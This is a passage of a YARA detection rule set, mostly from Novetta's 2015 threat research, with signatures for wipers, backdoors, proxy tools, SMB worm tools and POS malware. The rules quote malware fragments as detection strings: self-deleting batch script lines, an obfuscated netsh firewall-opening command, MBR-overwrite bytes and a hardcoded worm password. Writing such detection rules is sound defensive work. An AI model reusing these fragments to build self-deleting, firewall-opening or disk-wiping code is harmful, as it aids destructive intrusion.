    $recvFunc in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $apiLoader in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $recvPeers in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $logFileName
}

rule TangoAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $firewall = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""
    $testStatus1 = "*****[Start Test -> %s:%d]" wide
    $testStatus2 = "*****[Relay Connect " wide
    $testStatus3 = "*****[Listen Port %d] - " wide
    $testStatus4 = "*****[Error Socket]" wide
    $testStatus5 = "*****[End Test]" wide
  condition:
    2 of them
}

rule TangoBravo {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "2aa9cd3a2db2bd9dbe5ee36d9a5fc42b50beca806f9d644f387d5a680a580896"
  strings:
    $targetDomainCheck = { 5? 5? FF ?? 83 C4 08 85 C0 75 ?? 8? ?? 08 01 00 00 8? ?? 08 01 00 00 4? 8B ?? 84 ?? 75 }
  condition:
    $targetDomainCheck in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule UniformAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "a24377681cf56c712e544af01ac8a5dbaa81d16851a17a147bbf5132890d7437"
  strings:
    $stopDeleteService = { 8D [3] 5? 6A 01 5? FF D? 83 [3] 01 75 ?? 5? FF 15 }
  condition:
    $stopDeleteService in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule UniformJuliett {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "Cmd03000_1a6f62e1630d512c3b67bfdbff26270177585c82802ffa834b768ff47be0a008.bin"
  strings:
    $a = { 56 FF D5 68 B8 0B 00 00 FF 15 [4] 6A 00 68 [4] E8 [4] 83 C4 08 68 [4] FF 15 }
    $ = "wauserv.dll"
    $ = "Rpcss"
  condition:
    all of them
}

rule WhiskeyAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "1c66e67a8531e3ff1c64ae57e6edfde7bef2352d.ex_"
  strings:
    $randomBuffer = { E8 [4] B1 ?? F6 E9 88 [3] 4? 81 ?? 00 00 01 00 7C }
    $mbrDiskInfo = { 89 ?? 09 C7 ?? 65 00 00 02 00 C7 ?? 15 04 00 00 00 C6 ?? 08 08 C7 ?? 04 00 02 00 00 89 ?? 89 ?? 0D C7 ?? 11 01 00 00 00 89 ?? 69 89 ?? 19 B8 01 00 00 00 }
    $mbrReplacement_Decoded = { B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 }
    $mbrReplacement_Encoded = { E7 10 E3 53 9E 40 AD 91 D3 A9 D7 2F A0 E1 D3 EC 36 2F D2 56 53 57 D0 06 51 53 D0 06 57 53 }
    $licKey = "99E2428CCA4309C68AAF8C616EF3306582A64513E55C786A864BC83DAFE0C78585B692047273B0E55275102C664C5217E76B8E67F35FCE385E4328EE1AD139EA6AA26345C4F93000DBBC7EF1579D4F"
  condition:
    $licKey or $mbrReplacement_Decoded or $mbrReplacement_Encoded or $randomBuffer in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $mbrDiskInfo in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule WhiskeyBravo {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "74eac0461c40316689ac2d598f606caa3965195b22f23d5acefeedfcdf056c5b"
    Source = "d079a266ed2a852c33cdac3df115d163ebbf2c8dae32d935e895cf8193163b13"
  strings:
    $a = { 68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 [4] [0-2] 68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 [4] [0-2] 68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 }
    $ext1 = ".wpd" wide nocase
    $ext2 = ".doc" wide nocase
    $ext3 = ".hwp" wide nocase
  condition:
    2 of ($ext*) and $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule WhiskeyCharlie {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "47ff4f73738acc2f8433dccb2caf980d7444d723ccf2968d69f88f8f96405f96"
  strings:
    $a = { 66 89 55 DC E8 [4] 6A 0C 99 59 F7 F9 42 66 89 55 DE E8 [4] 6A 1C 99 59 F7 F9 42 66 89 55 E2 E8 [4] 6A 18 99 59 F7 F9 66 89 55 E4 E8 [4] 6A 3C 99 59 F7 F9 66 89 55 E6 E8 [4] 6A 3C 99 59 F7 F9 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule WhiskeyDelta {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group  trig@novetta.com"
    Source = "41badf10ef6f469dd1c3be201aba809f9c42f86ad77d7f83bc3895bfa289c635"
  strings:
    $decryption = { F3 A5 8B 7C 24 30 85 FF 7E ?? 8B 74 24 2C 8A 44 24 08 53 8A 4C 24 21 8A 5C 24 2B 32 C1 8A 0C 32 32 C3 32 C8 88 0C 32 B9 1E 00 00 00 8A 5C 0C 0C 88 5C 0C 0D 49 83 F9 FF 7F ?? 42 }
    $s1 = "=====IsFile=====" wide
    $s2 = "=====4M=====" wide
    $s3 = "=====IsBackup=====" wide
  condition:
    2 of ($s*) or $decryption in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule SMB_Worm_Tool {
  strings:
    $STR1 = "Global\\FwtSqmSession106829323_S-1-5-19"
    $STR2 = "EVERYONE"
    $STR3 = "y0uar3@s!llyid!07,ou74n60u7f001"
    $STR4 = "\\KB25468.dat"
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule Lightweight_Backdoor1 {
  strings:
    $STR1 = "NetMgStart"
    $STR2 = "Netmgmt.srg"
  condition:
    (uint16(0) == 23117) and all of them
}

rule LightweightBackdoor2 {
  strings:
    $STR1 = "prxTroy" ascii wide nocase
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule LightweightBackdoor3 {
  strings:
    $strl = { C6 45 E8 64 C6 45 E9 61 C6 45 EA 79 C6 45 EB 69 C6 45 EC 70 C6 45 ED 6D C6 45 EE 72 C6 45 EF 2E C6 45 F0 74 C6 45 F1 62 C6 45 F2 6C }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule LightweightBackdoor4 {
  strings:
    $strl = { C6 45 F4 61 C6 45 F5 6E C6 45 F6 73 C6 45 F7 69 C6 45 F8 2E C6 45 F9 6E C6 45 FA 6C C6 45 FB 73 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule LightweightBackdoor5 {
  strings:
    $strl = { C6 45 F4 74 C6 45 F5 6C C6 45 F6 76 C6 45 F7 63 C6 45 F8 2E C6 45 F9 6E C6 45 FA 6C C6 45 FB 73 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule LightweightBackdoor6 {
  strings:
    $STR1 = { 8A 10 80 ?? 4E 80 ?? 79 88 10 }
    $STR2 = { 8A 10 80 ?? 79 80 ?? 4E 88 10 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule ProxyTool1 {
  strings:
    $STR1 = "pmsconfig.msi" wide
    $STR2 = "pmslog.msi" wide
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and any of them
}

rule ProxyTool2 {
  strings:
    $STR1 = { 82 F4 DE D4 D3 C2 CA F5 C8 C8 D3 82 FB F4 DE D4 D3 C2 CA 94 95 FB D4 D1 C4 CF C8 D4 D3 89 C2 DF C2 87 8A CC 87 00 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule ProxyTool3 {
  strings:
    $STR2 = { 8A 04 17 8B FB 34 A7 46 88 02 83 C9 FF }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and $STR2
}

rule DestructiveHardDriveTool1 {
  strings:
    $str0 = "MZ"
    $str1 = { C6 84 24 ?? ( 00 | 01 ) 00 00 }
    $xorInLoop = { 83 EC 20 B9 08 00 00 00 33 D2 56 8B 74 24 30 57 8D 7C 24 08 F3 A5 8B 7C 24 30 85 FF 7E 3A 8B 74 24 2C 8A 44 24 08 53 8A 4C 24 21 8A 5C 24 2B 32 C1 8A 0C 32 32 C3 32 C8 88 0C 32 B9 1E 00 00 00 8A 5C 0C 0C 88 5C 0C 0D 49 83 F9 FF 7F F2 42 88 44 24 0C 3B D7 7C D0 5B 5F 5E 83 C4 20 C3 }
  condition:
    $str0 at 0 and $xorInLoop and #str1 > 300
}

rule DestructiveTargetCleaningTool2 {
  strings:
    $secureWipe = { 83 EC 34 53 55 8B 6C 24 40 56 57 83 CE FF 55 C7 44 24 2C D3 00 00 00 C7 44 24 30 2C 00 00 00 89 74 24 34 89 74 24 38 C7 44 24 3C 95 00 00 00 C7 44 24 40 6A 00 00 00 89 74 24 44 C7 44 24 14 07 00 00 00 FF 15 ?? ?? ?? ?? 3B C6 89 44 24 1C 0F 84 ( D8 | D9 ) 01 00 00 33 FF 68 00 00 01 00 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF 89 5C 24 14 0F 84 ( BC | BD ) 01 00 00 8B 44 24 1C A8 01 74 0A 24 FE 50 55 FF 15 ?? ?? ?? ?? 8B 44 24 4C 2B C7 74 20 48 74 0F 83 E8 02 75 1C C7 44 24 10 03 00 00 00 EB 12 C7 44 24 10 01 00 00 00 89 74 24 28 EB 04 89 7C 24 10 8B 44 24 10 89 7C 24 1C 3B C7 0F 8E ( 5C | 5D ) 01 00 00 8D 44 24 28 89 44 24 4C EB 03 83 CE FF 8B 4C 24 4C 8B 01 3B C6 74 17 8A D0 B9 00 40 00 00 8A F2 8B FB 8B C2 C1 E0 10 66 8B C2 F3 AB EB ( 13 | 14 ) 33 F6 ( E8 | FF 15 ) ?? ?? ?? ?? 88 04 1E 46 81 FE 00 00 01 00 7C ( EF | EE ) 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 C0 55 FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 0F 84 FA 00 00 00 8D 44 24 20 50 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A 02 6A 00 6A FF 56 FF D5 8D 4C 24 18 6A 00 51 6A 01 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 8B 44 24 24 8B 54 24 20 33 FF 33 DB 85 C0 7C 5A 7F 0A 85 D2 76 54 EB 04 8B 54 24 20 8B CA BD 00 00 01 00 2B CF 1B C3 85 C0 7F 0A 7C 04 3B CD 73 04 2B D7 8B EA 8B 44 24 14 8D 54 24 18 6A 00 52 55 50 56 FF 15 ?? ?? ?? ?? 8B 6C 24 18 8B 44 24 24 03 FD 83 D3 00 3B D8 7C BE 7F 08 8B 54 24 20 3B FA 72 B8 8B 2D ?? ?? ?? ?? 8B 5C 24 10 8B 7C 24 1C 8D 4B FF 3B F9 75 17 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 4C 8B 6C 24 48 47 83 C1 04 3B FB 8B 5C 24 14 89 7C 24 1C 89 4C 24 4C 0F 8C ( AE | AD ) FE FF FF 6A 00 55 E8 ?? ?? ?? ?? 83 C4 08 53 FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 83 C4 34 C3 }
  condition:
    $secureWipe
}

rule DestructiveTargetCleaningTool3 {
  strings:
    $S1_CMD_Arg = "/install" fullword
    $S2_CMD_Parse = "\"%s\"  /install \"%s\"" fullword
    $S3_CMD_Builder = "\"%s\"  \"%s\" \"%s\" %s" fullword
  condition:
    all of them
}

rule DestructiveTargetCleaningTool4 {
  strings:
    $BATCH_SCRIPT_LN1_0 = "goto x" fullword
    $BATCH_SCRIPT_LN1_1 = "del" fullword
    $BATCH_SCRIPT_LN2_0 = "if exist" fullword
    $BATCH_SCRIPT_LN3_0 = ":x" fullword
    $BATCH_SCRIPT_LN4_0 = "zz%d.bat" fullword
  condition:
    (#BATCH_SCRIPT_LN1_1 == 2) and all of them
}

rule DestructiveTargetCleaningTool5 {
  strings:
    $MCU_DLL_ZLIB_COMPRESSED2 = { 5C EC AB AE 81 3C C9 BC D5 A5 42 F4 54 91 04 28 34 34 79 80 6F 71 D5 52 1E 2A 0D }
  condition:
    $MCU_DLL_ZLIB_COMPRESSED2
}

rule DestructiveTargetCleaningTool6 {
  strings:
    $MCU_INF_StartHexDec = { 01 03 46 08 0A 30 D6 36 33 00 0B 62 63 75 0A 50 52 32 2A 00 10 3D 1B 57 0A 30 E6 7F 2A 00 13 09 52 69 0A 50 3A 0D 2A 00 0E 00 A2 6E 15 10 45 56 76 65 72 63 6C 76 69 64 2E 65 78 65 }
    $MCU_INF_StartHexEnc = { 6C 32 72 38 69 58 BF 07 52 30 78 0A 0A 54 67 61 66 02 49 68 79 0C 7A 67 79 58 8F 5E 47 31 27 39 31 01 63 61 5B 3D 59 68 67 21 CF 5F 21 20 26 3E 1F 54 13 53 1F 1E 00 45 43 54 4C 55 }
  condition:
    $MCU_INF_StartHexEnc or $MCU_INF_StartHexDec
}

rule DestructiveTargetCleaningTool7 {
  strings:
    $a = "SetFilePointer"
    $b = "SetEndOfFile"
    $c = { 75 17 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 56 FF 15 ?? ?? ?? ?? 56 }
  condition:
    (uint16(0) == 23117 and uint16(uint32(60)) == 17744) and all of them
}

rule DestructiveTargetCleaningTool8 {
  strings:
    $license = { E9 03 FF FF 82 00 50 00 6F 00 72 00 74 00 69 00 6F 00 6E 00 73 00 20 00 63 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 52 00 6F 00 62 00 65 00 72 00 74 00 20 00 64 00 65 00 20 00 42 00 61 00 74 00 68 00 2C 00 20 00 4A 00 6F 00 72 00 69 00 73 00 20 00 76 00 61 00 6E 00 20 00 52 00 61 00 6E 00 74 00 77 00 69 00 6A 00 6B 00 2C 00 20 00 44 00 65 00 6C 00 69 00 61 00 6E 00 00 00 00 00 00 00 02 50 00 00 00 00 0A 00 22 00 CE 00 08 00 EA 03 FF FF 82 00 }
    $PuTTY = { 50 00 75 00 54 00 54 00 59 00 }
  condition:
    (uint16(0) == 23117 and uint16(uint32(60)) == 17744) and $license and not $PuTTY
}

rule Malwareusedbycyberthreatactor1 {
  strings:
    $heapCreateFunction_0 = { 33 C0 6A 00 39 44 24 08 68 00 10 00 00 0F 94 C0 50 FF 15 ?? ?? ?? ?? 85 C0 A3 ?? ?? ?? ?0 74 36 E8 93 FE FF FF 83 F8 03 A3 ?? ?? ?? ?0 75 0D 68 F8 03 00 00 E8 ?? 00 00 00 59 EB 0A 83 F8 02 75 18 E8 ?? ?? 00 00 85 C0 75 0F FF 35 ?? ?? ?? ?0 FF 15 ?? ?? ?? ?0 33 C0 C3 6A 01 58 C3 }
    $heapCreateFunction = { 55 8B EC B8 2C 12 00 00 E8 ?? ?? FF FF 8D 85 68 FF FF FF 53 50 C7 85 68 FF FF FF 94 00 00 00 FF 1? ?? ?? ?? ?0 85 C0 74 1A 83 BD 78 FF FF FF 02 75 11 83 BD 6C FF FF FF 05 72 08 6A 01 58 E9 02 01 00 00 8D 85 D4 ED FF F6 89 01 00 00 05 06 8? ?? ?? ?? 0F F1 5? ?? ?? ?? 08 5C 00 F8 4D 00 00 00 03 3D B8 D8 DD 4E DF FF F3 89 DD DF FF F7 41 38 A0 13 C6 17 C0 83 C7 A7 F0 42 C2 08 80 14 13 81 97 5E D8 D8 5D 4E DF FF F6 A1 65 06 8? ?? ?? ?? 0E 8? ?? ?0 00 08 3C 40 C8 5C 07 50 88 D8 5D 4E DF FF FE B4 98 D8 56 4F EF FF F6 80 40 10 00 05 05 3F F1 5? ?? ?? ?? 03 89 D6 4F EF FF F8 D8 D6 4F EF FF F7 41 38 A0 13 C6 17 C0 83 C7 A7 F0 42 C2 08 80 14 13 81 97 5E D8 D8 56 4F EF FF F5 08 D8 5D 4E DF FF F5 0E 8? ?? ?? ?? ?5 95 93 BC 37 43 E6 A2 C5 0E 8? ?? ?? ?? ?5 93 BC 35 97 43 04 08 BC 83 81 87 40 E8 03 93 B7 50 48 81 9E B0 14 13 81 97 5F 26 A0 A5 35 0E 8? ?? ?0 00 08 3C 40 C8 3F 80 27 41 D8 3F 80 37 41 88 3F 80 17 41 38 D4 5F C5 0E 89 8F EF FF F8 07 DF C0 65 91 BC 08 3C 00 35 BC 9C }
    $getMajorMinorLinker = { 56 8B 74 24 08 6A 00 83 26 00 FF 15 ?? ?? ?? ?0 66 81 38 4D 5A 75 14 8B 48 3C 85 C9 74 0D 03 C1 8A 48 1A 88 0E 8A 40 1B 88 46 01 5E C3 }
    $openServiceManager = { FF 15 ?? ?0 ?0 ?0 8B ?8 85 ?? 74 ?? ?? ?? ?? ?? ?? ?? ?? 5? FF 15 ?? ?0 ?0 ?0 8B ?? ?? ?0 ?0 ?0 8B F? 85 F? 74 }
  condition:
    all of them
}

rule Malwareusedbycyberthreatactor2 {
  strings:
    $str1 = "_quit"
    $str2 = "_exe"
    $str3 = "_put"
    $str4 = "_got"
    $str5 = "_get"
    $str6 = "_del"
    $str7 = "_dir"
    $str8 = { C7 44 24 18 1F F7 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule Malwareusedbycyberthreatactor3 {
  strings:
    $STR1 = { 50 68 80 00 00 00 68 FF FF 00 00 51 C7 44 24 1C 3A 8B 00 00 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule wiper_unique_strings {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    company = "novetta"
  strings:
    $a = "C!@I#%VJSIEOTQWPVz034vuA"
    $b = "BAISEO%$2fas9vQsfvx%$"
    $c = "1.2.7.f-hanba-win64-v1"
    $d = "md %s&copy %s\\*.* %s"
    $e = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""
    $f = "Ge.tVol. .umeIn..for  mati.onW"
  condition:
    $a or $b or $c or $d or $e or $f
}

rule wiper_encoded_strings {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    company = "novetta"
  strings:
    $scr = { 89 D4 C4 D5 00 00 00 }
    $explorer = { E2 DF D7 CB C8 D5 C2 D5 89 C2 DF C2 00 00 00 }
    $kernel32 = { CC C2 D5 C9 C2 CB 94 95 89 C3 CB CB 00 00 }
  condition:
    $scr or $explorer or $kernel32
}

rule createP2P {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "CreatP2P Thread" wide
  condition:
    any of them
}

rule firewallOpener {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""
  condition:
    any of them
}

rule Caracachs : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
  strings:
    $a = { B? 10 00 00 00 8B ?? C1 ?? 10 81 ?? FF 7F 00 00 03 ?? 8B ?? 8B ?? 83 ?? 0F 2B ?? D3 ?? 8B ?? D3 ?? 0B ?? 89 ?? }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule StringDotSimplified : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
  strings:
    $a = { F3 AB 80 ?? 00 74 ?? 8A 02 3C 2E 74 ?? 3C 20 74 ?? 88 06 46 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule FakeTLS_ServerHelloGetSelectedCipher : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
  strings:
    $a = { 24 10 0C 10 89 ?? 66 8? [3] 66 3? 00 C0 73 ?? 66 2? 35 00 66 F7 ?? 1B ?? 2? 80 0? 00 01 00 00 8B ?? 5? }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule XORDecodeA7 : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
  strings:
    $a = { 8A [2] 8B ?? 34 A7 46 88 ?? 83 ?? FF 33 ?? 4? F2 AE F7 ?? 4? 3B ?? }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule DynamicAPILoading : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
  strings:
    $a = { 83 C4 ?? 5? 5? FF 15 [4] 68 [4] A3 [4] E8 [4] 83 C4 ?? 5? 5? FF 15 [4] 68 [4] A3 [4] E8 [4] 83 C4 ?? 5? 5? FF 15 [4] 68 [4] A3 [4] E8 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule DNSCalcStyleEncodeAndDecode : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "975522bc3e07f7aa2c4a5457e6cc16c49a148b9f731134b8971983225835577e"
  strings:
    $a = { 8A ?? 80 ?? ?? 80 ?? ?? 88 ?? 4? 4? 75 ?? }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule GenerateTLSClientHelloPacket_Test : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
  strings:
    $a = { 25 07 00 00 80 79 ?? 4? 83 ?? F8 4? }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RC4SboxKeyGen : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "RT_RCDATA_101.bin.bin"
  strings:
    $a = { 8A [3] 8B ?? 81 ?? 0F 00 00 80 79 ?? 4? 83 ?? F0 4? }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RandomTimestampGenerator : sharedcode {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "RT_RCDATA_101.bin.bin joanap baseline sample"
  strings:
    $a = { 66 81 [3] FE FF FF [1-4] 99 B9 0C 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 1C 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 17 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 3B 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 3B 00 00 00 F7 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule CPUInfoExtraction {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "Cmd10010_296fcc9d611ca1b8f8288192d6d854cf4072853010cc65cb0c7f958626999fbd.bin"
  strings:
    $a = { 68 00 00 00 80 8B ?? 8B ?? 04 89 [3] 8B ?? 08 89 [3] 8B ?? 0C 8D [3] 89 [5] 5? 8B ?? 89 [5] E8 [4] 8B ?? 8B ?? 3D 00 00 00 80 8B ?? 04 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule SuicideScriptL1 {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = ":L1\ndel \"%s\"\nif exist \"%s\" goto L1\ndel \"%s\"\n"
  condition:
    any of them
}

rule SuicideScriptR1_Multi {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "\" goto R1\ndel /a \""
    $ = "\"\nif exist \""
    $ = "@echo off\n:R1\ndel /a \""
  condition:
    all of them
}

rule SuicideScriptR {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat"
  condition:
    all of them
}

rule blackpos_v2 {
  meta:
    author = "@patrickrolsen"
    version = "0.1"
    reference = "http://blog.nuix.com/2014/09/08/blackpos-v2-new-variant-or-different-family"
  strings:
    $s1 = "Usage: -[start|stop|install|uninstall"
    $s2 = "\\SYSTEM32\\sc.exe config LanmanWorkstation"
    $s3 = "t.bat"
    $s4 = "mcfmisvc"
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule dump_tool {
  meta:
    author = "@patrickrolsen"
    reference = "Related to pwdump6 and fgdump tools"
  strings:
    $s1 = "lsremora"
    $s2 = "servpw"
    $s3 = "failed: %d"
    $s4 = "fgdump"
    $s5 = "fgexec"
    $s6 = "fgexecpipe"
  condition:
    uint16(0) == 23117 and 3 of ($s*)
}

rule osql_tool {
  meta:
    author = "@patrickrolsen"
    reference = "O/I SQL - SQL query tool"
    filetype = "EXE"
    version = "0.1"
    date = "1/30/2014"
  strings:
    $s1 = "osql\\src"
    $s2 = "OSQLUSER"
    $s3 = "OSQLPASSWORD"
    $s4 = "OSQLSERVER"
  condition:
    uint16(0) == 23117 and (all of ($s*))
}

rule misc_pos {
  meta:
    author = "@patrickrolsen"
    reference = "POS Malware"
  strings:
